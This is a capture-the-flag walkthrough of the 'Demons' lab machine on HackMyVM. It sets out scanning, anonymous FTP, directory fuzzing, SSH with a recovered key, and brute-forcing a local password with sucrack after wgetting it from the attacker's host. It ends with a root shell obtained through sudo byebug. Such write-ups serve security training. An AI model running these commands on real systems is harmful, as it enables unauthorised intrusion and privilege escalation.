NOTES ABOUT Demons
[ 2022-10-09 ] [ HackMyVM / Demons ]Status: Rooted
Skills: Port Scanning, Fuzzing, VBA Macros, Sudo
Tools: nmap, gobuster, nc, ftp, msaccess, wget, crunch, ssh, sucrack, sudo, byebug
PORT SCANNING
$ nmap -T4 -sCSV -p- 10.0.2.22
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.0.2.15
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 5e:44:8a:b1:77:0c:42:79:16:64:8d:af:b4:78:bb:b4 (RSA)
| 256 cb:0f:a7:df:7f:23:78:5a:08:e3:4f:b6:43:7c:11:84 (ECDSA)
|_ 256 a0:4a:26:bf:40:08:68:c2:b1:04:88:b4:8b:a2:45:2f (ED25519)
80/tcp open http Apache httpd 2.4.48 ((Debian))
|_http-title: DemonsCloseCall
|_http-server-header: Apache/2.4.48 (Debian)
GETTING IN
$ ftp 10.0.2.22
Connected to 10.0.2.22.
220 (vsFTPd 3.0.3)
Name (10.0.2.22:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
ftp> ls -la
229 Entering Extended Passive Mode (|||50355|)
150 Here comes the directory listing.
drwxrwxrwx 2 0 0 4096 Sep 16 2021 .
drwxr-xr-x 3 0 115 4096 Sep 16 2021 ..
-rw-r--r-- 1 0 0 55 Sep 10 2021 .what
-rw------- 1 1000 1000 12018 Sep 10 2021 DemonsCellsDogma.xlsx
-rwxrwxrwx 1 1000 1000 339968 Sep 16 2021 DemonsVBAMacroTools.mdb
226 Directory send OK.
ftp> get .what
ftp> get DemonsVBAMacroTools.mdb
I WISH I COULD RESOLVE THIS ANOTHER WAY BUY MDBTOOLS
ONLY LET ME KNOW ABOUT THE PRIVATE KEY BUT I WAS
UNABLE TO EXTRACT IT WITHOUT USING MS ACCESS.
$ gobuster -q dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.0.2.22 -x html,htm,php,txt,xml
/index.html (Status: 200) [Size: 442]
/manual (Status: 301) [Size: 307] [--> http://10.0.2.22/manual/]
/javascript (Status: 301) [Size: 311] [--> http://10.0.2.22/javascript/]
/hell (Status: 301) [Size: 305] [--> http://10.0.2.22/hell/]
/server-status (Status: 403) [Size: 274]
IMAGES NAMES ARE DEMON'S NAMES
$ ssh -i ./id_rsa aim@10.0.2.22
Last login: Mon Oct 10 00:07:20 2022 from 10.0.2.15
aim@Demons:~$ cat user.txt
***************
ELEVATING PRIVILEGES
aim@Demons:~$ find / -xdev -type d -perm 0777 2>/dev/null
/var/www/html/hell/weare
/srv/ftp/.toolsHidden
aim@Demons:~$ cp ./key8_8.jpg /var/www/html/hell/weare
$ crunch 8 8 dfnmo34 -o wordlist.txt
$ grep "^d3mon" wordlist.txt > d3mon.txt
aim@Demons:~$ wget 10.0.2.15:8000/d3mon.txt
aim@Demons:~$ wget 10.0.2.15:8000/sucrack
aim@Demons:~$ chmod +x sucrack
aim@Demons:~$ ./sucrack -u agares d3mon.txt
password is: ******
aim@Demons:~$ su agares
Password:
agares@Demons:/home/aim$
agares@Demons:/home/aim$ sudo -l
[sudo] password di agares:
Corrispondenza voci Defaults per agares su Demons:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
L\'utente agares può eseguire i seguenti comandi su Demons:
(ALL : ALL) /bin/byebug
agares@Demons:~$ echo 'system("/bin/sh")' > sh.rb
agares@Demons:~$ sudo byebug sh.rb
[sudo] password di agares:
[1, 1] in /home/agares/sh.rb
=> 1: system("/bin/sh")
(byebug) continue
# id
uid=0(root) gid=0(root) gruppi=0(root)
root@Demons:~# cat root.txt
***************
root@Demons:~# init 0